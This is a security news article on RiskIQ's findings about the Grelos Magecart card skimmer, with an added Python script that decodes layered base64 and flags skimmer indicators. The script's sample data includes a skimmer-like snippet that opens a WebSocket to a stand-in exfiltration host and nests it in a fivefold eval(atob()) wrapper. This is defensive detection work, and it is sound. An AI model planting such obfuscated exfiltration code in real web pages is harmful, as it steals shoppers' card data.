The discovery of a new skimmer variant, Grelos, illustrates how hard it has become to attribute individual Magecart campaigns.
On Wednesday, RiskIQ researchers described how the new Grelos skimmer shows "increased overlap" in Magecart infrastructure and crews: this malware, alongside other skimmer families, is now hosted on domain infrastructure shared by many groups or affiliates through WHOIS registrations, well-known phishing campaigns and the development of other malware, creating "interrelationships" that may be difficult to untangle.
Magecart is an umbrella term for the threat groups and campaigns that specialize in stealing payment card data from e-commerce sites.
Several years ago, well-known brands such as British Airways and Ticketmaster became the first major victims of this form of attack and since then, countless sites have fallen victim to the same technique.
The new version of the Grelos skimmer, malware that has existed since at least 2015 and is associated with Magecart Groups 1 and 2, resembles a separate strain described by researcher @AffableKraut in July. That variant is a WebSocket-based skimmer that uses base64 encoding to hide its activity.
"We believe that this skimmer is not directly related to the activity of Group 1-2 from 2015-16, but instead it is a repetition of their code," says RiskIQ. "This version of the skimmer has a 'loader stage' and a 'skimmer stage' - both of which have a fivefold base64 encoding."
The domains used in this attack led the team to a cookie and related skimmer domains, including facebookapimanager[.]com and googleapimanager[.]com.
However, instead of finding the Fullz House skimmer, the researchers discovered a new skimmer variant, Grelos. This strain has a similar base64-encoded loader stage, but uses only a single layer of encoding, contains duplicated script tags and spelling mistakes, and includes a dictionary named "translate" that holds the phrases shown on the fake payment forms the malware creates. WebSockets are still used for data exfiltration.
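The two traits the article singles out, layered base64 encoding and a WebSocket channel with a "translate" dictionary, are what a defender would look for when triaging a suspicious script tag on a checkout page. The script below is an added example, not RiskIQ's code or anything published with the article: it peels base64 layers off a JavaScript blob, counts them, and reports which indicators appear in the decoded text. The inner skimmer-like script, the `eval(atob(...))` wrapping used to build the sample, the 40-character token threshold and the indicator list are all constructed assumptions for the demonstration.

```python
import base64
import binascii
import re

# Strings worth flagging once the encoding is removed. "WebSocket" and "translate"
# come from the behaviour described in the article; "atob" is a generic hint that
# a script decodes base64 at runtime (assumption: loaders commonly use it).
INDICATORS = ("WebSocket", "translate", "atob")

# A base64 run long enough to be a payload rather than an identifier (assumed threshold).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def try_decode(token: str):
    """Decode a base64 token to printable text, or return None if it is not one."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    # Reject random-looking bytes that happen to be valid UTF-8.
    if not all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text):
        return None
    return text


def peel(script: str, max_layers: int = 10):
    """Repeatedly replace the longest base64 token with its decoded text.

    Returns (layers_removed, final_text). The cap stops runaway loops on
    adversarial input.
    """
    text = script
    layers = 0
    while layers < max_layers:
        tokens = B64_TOKEN.findall(text)
        if not tokens:
            break
        token = max(tokens, key=len)
        decoded = try_decode(token)
        if decoded is None:
            break
        text = text.replace(token, decoded)
        layers += 1
    return layers, text


def scan(script: str) -> dict:
    """Summarise a script: encoding depth, indicators found, and a verdict.

    A plain script that opens a WebSocket is ordinary; the combination of
    at least one encoding layer and skimmer-like strings is what we flag.
    """
    layers, plain = peel(script)
    hits = [word for word in INDICATORS if word in plain]
    return {
        "layers": layers,
        "indicators": hits,
        "suspicious": layers >= 1 and any(h in ("WebSocket", "translate") for h in hits),
    }


# ---- constructed sample data (not real skimmer code) ----
INNER = ('var translate={"card":"Card number"};'
         'var ws=new WebSocket("wss://exfil.example.invalid/");')
BENIGN = 'var greeting = "hello"; console.log(greeting);'


def wrap(script: str, times: int) -> str:
    """Nest a script inside `eval(atob("..."))` the given number of times."""
    blob = script
    for _ in range(times):
        encoded = base64.b64encode(blob.encode()).decode()
        blob = f'eval(atob("{encoded}"));'
    return blob


if __name__ == "__main__":
    for name, sample in (("fivefold", wrap(INNER, 5)),
                         ("single", wrap(INNER, 1)),
                         ("benign", BENIGN)):
        print(name, scan(sample))
```

Run against a page's inline scripts, the `layers` count separates a fivefold-encoded loader from the single-layer variant the article describes, while `indicators` tells the analyst what the decoded stage actually does before anyone has to execute it.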
RiskIQ has observed several new skimmer variants associated with Magecart in recent years. The company says the Fullz House skimmer has been adopted by other hacking groups, some of which use the same infrastructure, such as hosting providers, to host other skimmers, including Grelos, which also shares IP addresses with the Inter skimmer.
This, in turn, creates a "murkiness" in tracking the activities of individual Magecart crews, many of which are actively launching new attacks against e-commerce companies on a daily basis.